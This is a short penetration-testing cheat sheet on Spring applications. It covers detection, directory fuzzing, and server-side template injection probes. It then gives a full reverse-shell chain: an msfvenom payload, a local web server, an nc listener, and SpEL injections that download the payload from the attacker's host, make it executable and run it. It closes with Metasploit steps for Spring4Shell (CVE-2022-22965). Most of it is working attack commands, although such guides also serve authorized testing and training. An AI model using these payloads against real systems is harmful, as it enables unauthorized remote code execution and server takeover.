Spring Pentesting
Last modified: 2023-09-15
Spring is an application framework and inversion of control container for the Java platform.
Framework Detection
If we get the Whitelabel Error Page, the website may use Spring Boot.
Enumeration
Directory Discovery
ffuf -u https://example.com/FUZZ -w seclists/Discovery/Web-Content/spring-boot.txt
SSTI
Discovery
If there is an input form, such as a search form, or URL parameter which the parameter is reflected in the website, you may be able to find the vulnerability to the server-side template injection.
Try them:
2*2
#{2*2}
*{2*2}
Then you can also check more about that.
{"dfd".replace("d", "x")}
#{"dfd".replace("d", "x")}
*{"dfd".replace("d", "x")}
// ---------------------------------------
// the desired output of the above...
"xfx"
Reverse Shell
First generate the payload of the reverse shell which will be downloaded from the website.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<local-ip> LPORT=<local-port> -f elf > r.elf
Start a local web server to allow the website to download the payload named “r.elf”
python3 -m http.server 8000
In another terminal, open listener for getting the reverse shell.
nc -lvnp <local-port>
In the target website,
*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("wget http://<local-ip>:8000/r.elf")}
*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("chmod 777 ./r.elf")}
*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("./r.elf")}
Finally we should see to get the shell.
Spring4Shell (CVE-2022-22965)
Spring4Shell is a vulnerabilitiy to remote code execution in Spring framework. It affects a component in Spring Core which is the heart of the framework.
It is identified as a bypass of the patch for CVE-2010-1622.
Exploitation
We can use Metasploit for this exploitation.
msfconsole
msf> use exploit/multi/http/spring_framework_rce_spring4shell
Alternatively, various PoCs are available in GitHub repositories.